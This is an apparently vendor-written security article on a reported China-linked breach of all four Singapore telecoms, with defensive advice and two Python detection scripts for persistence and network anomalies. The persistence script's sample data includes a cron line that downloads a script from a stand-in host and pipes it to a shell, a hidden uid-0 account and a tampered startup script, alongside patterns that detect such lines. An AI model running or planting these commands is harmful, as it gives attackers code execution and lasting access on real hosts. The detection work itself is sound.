China Hacked All Four Singapore Telecoms. The Operation Took 11 Months to Clean Up.
UNC3886 used zero-days and rootkits to breach every major telecom provider in Singapore. The government ran an 11-month counteroperation called CYBER GUARDIAN. If state actors can own an entire country's telecom, what chance does your business have without help?
# Every telecom in the country. All four. At the same time.
In February 2026, Singapore's Cyber Security Agency revealed that a China-linked threat group tracked as UNC3886 had breached all four of Singapore's major telecommunications providers. Not one. Not two. All of them.
The attackers used zero-day exploits and custom rootkits to gain persistent access. "Persistent" meaning they were embedded so deeply that the Singaporean government had to run an 11-month counteroperation called CYBER GUARDIAN to fully eradicate them.
Eleven months. An entire country's cybersecurity apparatus working for nearly a year to clean up one intrusion. That's how deep the attackers got.
# Why telecoms matter.
Telecom providers carry the communications of an entire population. Phone calls, text messages, internet traffic, metadata about who talks to whom and when. Intelligence agencies target telecoms because compromising one gives you surveillance capabilities over an entire country.
But this isn't just an intelligence problem. It's a business problem. Because your business depends on telecom infrastructure:
- Your phone calls go through telecom networks
- Your internet traffic goes through telecom networks
- Your VPN connections go through telecom networks
- Your cloud services are reachable through telecom networks
If the telecom is compromised, the attacker can potentially intercept, redirect, or monitor any of that traffic. Including yours.
# The lesson for businesses that aren't telecoms.
If a nation-state can breach all four telecoms in a technologically advanced country like Singapore, the question isn't whether sophisticated attackers can breach your network. They can. The question is whether you've done enough to make it difficult, detect it quickly, and limit the damage.
Zero-days and custom rootkits are nation-state tools. Most businesses won't face that level of adversary. But the principles that make those attacks successful apply at every level:
Unpatched systems are entry points. The zero-days used against Singapore's telecoms were vulnerabilities with no patch available yet. Your unpatched firewall, your unpatched Exchange server, and your unpatched WordPress install are the entry points for the attackers who target businesses your size.
Persistence means the attacker comes back. Rootkits let the Singapore attackers survive reboots, updates, and even some remediation attempts. At the small business level, persistence looks like a backdoor user account nobody notices, a scheduled task that re-downloads malware, or a modified startup script. If your incident response doesn't include thorough persistence hunting, the attacker comes back.
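Persistence hunting at the small-business level comes down to comparing what a host looks like now with what it looked like when it was known-good. The Python below is an added example, not code from the article or from the CYBER GUARDIAN operation: it diffs a baseline snapshot of local accounts, cron entries and startup scripts against a current snapshot and flags the three patterns named above. The snapshot contents, paths, severities and the download/pipe-to-shell patterns are constructed assumptions for illustration; a real deployment would record the baseline from its own hosts.

```python
"""Persistence hunt by baseline comparison (added example, not from the article).

Assumption: a snapshot of local accounts, cron jobs and startup scripts was
recorded while the host was known-good, and the same snapshot is taken now.
The helpers diff the two and flag the persistence patterns the article names:
a new (especially uid 0) account, a scheduled task that re-downloads
something, and a startup script whose content changed.
All snapshot data below is constructed for the example.
"""
import hashlib
import re

# Constructed /etc/passwd-style records: name:x:uid:gid:gecos:home:shell
BASELINE_PASSWD = """root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""
# Current snapshot: one extra account that nobody created on purpose
CURRENT_PASSWD = BASELINE_PASSWD + "sysupd:x:0:0:system update:/var/tmp:/bin/bash\n"

# Constructed crontab lines: m h dom mon dow command
BASELINE_CRON = """0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * /usr/bin/logrotate /etc/logrotate.conf
"""
# Current snapshot: a new job that fetches and runs something every 10 minutes
CURRENT_CRON = BASELINE_CRON + "*/10 * * * * curl -s http://example.invalid/u.sh | sh\n"

# Constructed startup scripts, keyed by path -> contents
BASELINE_STARTUP = {"/etc/rc.local": "#!/bin/sh\nexit 0\n"}
CURRENT_STARTUP = {"/etc/rc.local": "#!/bin/sh\n/var/tmp/.x &\nexit 0\n"}

# Heuristics for "re-downloads malware": a fetch tool with a URL, or a pipe into a shell
DOWNLOAD_PATTERN = re.compile(r"\b(curl|wget)\b.*(https?://)", re.IGNORECASE)
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b")


def parse_passwd(text):
    """Map user name -> uid for passwd-style text."""
    users = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3:
            users[fields[0]] = int(fields[2])
    return users


def hunt_accounts(baseline, current):
    """Flag accounts absent from the baseline; uid 0 accounts are high severity."""
    findings = []
    base, cur = parse_passwd(baseline), parse_passwd(current)
    for name, uid in cur.items():
        if name not in base:
            sev = "high" if uid == 0 else "medium"
            findings.append((sev, f"new account {name} (uid {uid})"))
    return findings


def hunt_cron(baseline, current):
    """Flag cron lines not in the baseline; downloads and pipe-to-shell are high."""
    base = set(baseline.splitlines())
    findings = []
    for line in current.splitlines():
        if line in base or not line.strip():
            continue
        suspicious = DOWNLOAD_PATTERN.search(line) or PIPE_TO_SHELL.search(line)
        findings.append(("high" if suspicious else "medium", f"new scheduled task: {line}"))
    return findings


def hunt_startup(baseline, current):
    """Flag startup scripts that are new or whose sha256 differs from the baseline."""
    findings = []
    for path, content in current.items():
        digest = hashlib.sha256(content.encode()).hexdigest()
        if path not in baseline:
            findings.append(("medium", f"new startup script {path} ({digest[:12]})"))
        elif hashlib.sha256(baseline[path].encode()).hexdigest() != digest:
            findings.append(("high", f"modified startup script {path} ({digest[:12]})"))
    return findings


def hunt_all():
    """Run all three hunts over the constructed snapshots."""
    return (hunt_accounts(BASELINE_PASSWD, CURRENT_PASSWD)
            + hunt_cron(BASELINE_CRON, CURRENT_CRON)
            + hunt_startup(BASELINE_STARTUP, CURRENT_STARTUP))


if __name__ == "__main__":
    for sev, msg in hunt_all():
        print(f"[{sev.upper()}] {msg}")
```

The design point is that none of the checks needs a signature for a specific piece of malware: anything that was not there when the machine was clean is a finding, and the heuristics only decide how loudly to shout. Re-running the hunt after remediation, against the same baseline, is how you confirm the attacker did not come back.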
Detection is the difference. Singapore detected the breach and spent 11 months remediating. Many businesses never detect the breach at all. The average dwell time for small businesses is 197 days. That's over six months of an attacker living in your systems before anyone notices.
# What to do.
- Assume breach. Plan for detection and response, not just prevention. Firewalls and antivirus are prevention. Monitoring, EDR, and incident response plans are detection and response. You need both.
- Encrypt sensitive communications. Don't rely solely on the telecom to protect your data in transit. Use end-to-end encrypted communications for sensitive business discussions. Signal for messaging. Encrypted email (S/MIME or PGP) for confidential documents.
- Use a VPN for sensitive operations. A VPN doesn't protect against a compromised telecom (the VPN tunnel still travels over their network), but it does encrypt the contents so interception yields encrypted data rather than plaintext.
- Monitor for anomalous network behavior. Connections to unexpected countries, unusual data transfer volumes, DNS queries to suspicious domains. Wazuh and Pi-hole can help at the small business level.
- Patch everything. The attackers used zero-days, but most businesses get breached through known vulnerabilities with available patches. You can't prevent zero-days, but you can close every known hole. Subscribe to CISA KEV for what's actively exploited.
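The monitoring item above names three signals worth alerting on: destinations in countries the business never talks to, outbound volume far above a host's normal, and DNS queries to domains that are blocklisted or look machine-generated. The Python below is an added example, not the article's code and not Wazuh's or Pi-hole's, that runs those three checks over a constructed connection log and DNS log. The expected-country list, the per-host byte baseline, the blocklist, the country code "ZZ" and the entropy threshold are all assumptions a real deployment would maintain from its own data.

```python
"""Network anomaly triage over sample logs (added example, not from the article).

Assumes a connection log (one outbound flow per record: timestamp, src, dst,
dst_country, bytes_out) and a DNS query log, both as CSV text constructed here.
Flags the three signals the article lists: unexpected destination countries,
outbound volume well above the per-host baseline, and blocklisted or
random-looking domain names.
"""
import csv
import io
import math
from collections import Counter

# Assumption: countries this (constructed) business expects its traffic to reach
EXPECTED_COUNTRIES = {"SG", "US", "MY"}
# Assumption: per-host daily outbound baseline in bytes as (mean, stddev), learned from past logs
BASELINE_BYTES_OUT = {
    "10.0.0.5": (50_000_000, 10_000_000),
    "10.0.0.8": (2_000_000, 500_000),
}
# Assumption: domains a threat-intel feed or Pi-hole list has flagged
DNS_BLOCKLIST = {"bad.example.invalid"}

# Constructed connection log ("ZZ" is a placeholder code for a country the
# business never exchanges traffic with)
CONN_LOG = """ts,src,dst,dst_country,bytes_out
2026-02-10T09:00:00Z,10.0.0.5,203.0.113.10,SG,40000000
2026-02-10T09:05:00Z,10.0.0.8,198.51.100.7,US,1500000
2026-02-10T02:13:00Z,10.0.0.8,192.0.2.44,ZZ,9000000
"""

# Constructed DNS query log
DNS_LOG = """ts,src,qname
2026-02-10T09:01:00Z,10.0.0.5,www.example.com
2026-02-10T02:12:30Z,10.0.0.8,bad.example.invalid
2026-02-10T02:12:45Z,10.0.0.8,x7k2q9v1m4z8p3w6.example.net
"""


def shannon_entropy(text):
    """Bits of entropy per character; random-looking labels score high."""
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def flag_connections(log_text, z_threshold=3.0):
    """Return (kind, src, detail) findings for unexpected countries and volume spikes."""
    findings = []
    bytes_out = Counter()
    for row in csv.DictReader(io.StringIO(log_text)):
        if row["dst_country"] not in EXPECTED_COUNTRIES:
            findings.append(("geo", row["src"],
                             f"connection to {row['dst']} in {row['dst_country']}"))
        bytes_out[row["src"]] += int(row["bytes_out"])
    for src, total in bytes_out.items():
        if src not in BASELINE_BYTES_OUT:
            continue  # no baseline yet, so nothing to compare against
        mean, sd = BASELINE_BYTES_OUT[src]
        z = (total - mean) / sd
        if z > z_threshold:
            findings.append(("volume", src, f"{total} bytes out is {z:.1f} sd above baseline"))
    return findings


def flag_dns(log_text, entropy_threshold=3.5, min_label_len=12):
    """Return findings for blocklisted domains and high-entropy (DGA-like) labels."""
    findings = []
    for row in csv.DictReader(io.StringIO(log_text)):
        qname = row["qname"].lower().rstrip(".")
        blocked = any(qname == d or qname.endswith("." + d) for d in DNS_BLOCKLIST)
        if blocked:
            findings.append(("dns-blocklist", row["src"], qname))
            continue
        label = qname.split(".")[0]
        if len(label) >= min_label_len and shannon_entropy(label) >= entropy_threshold:
            findings.append(("dns-entropy", row["src"], qname))
    return findings


def triage():
    """Run both detectors and group findings by source host for an analyst."""
    by_host = {}
    for kind, src, detail in flag_connections(CONN_LOG) + flag_dns(DNS_LOG):
        by_host.setdefault(src, []).append((kind, detail))
    return by_host


if __name__ == "__main__":
    for host, items in triage().items():
        print(host)
        for kind, detail in items:
            print(f"  [{kind}] {detail}")
```

Grouping by source host is deliberate: one host tripping all three detectors in the same early-morning window is a far stronger signal than any single alert, and it is the kind of correlation a SIEM such as Wazuh does for you once the individual rules exist.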
# Further reading
- Singapore CSA: CYBER GUARDIAN - Singapore's cybersecurity response
- Mandiant: UNC3886 - threat actor tracking and analysis
- Signal - end-to-end encrypted messaging
- Wazuh - open source network monitoring
- CISA KEV Catalog - actively exploited vulnerabilities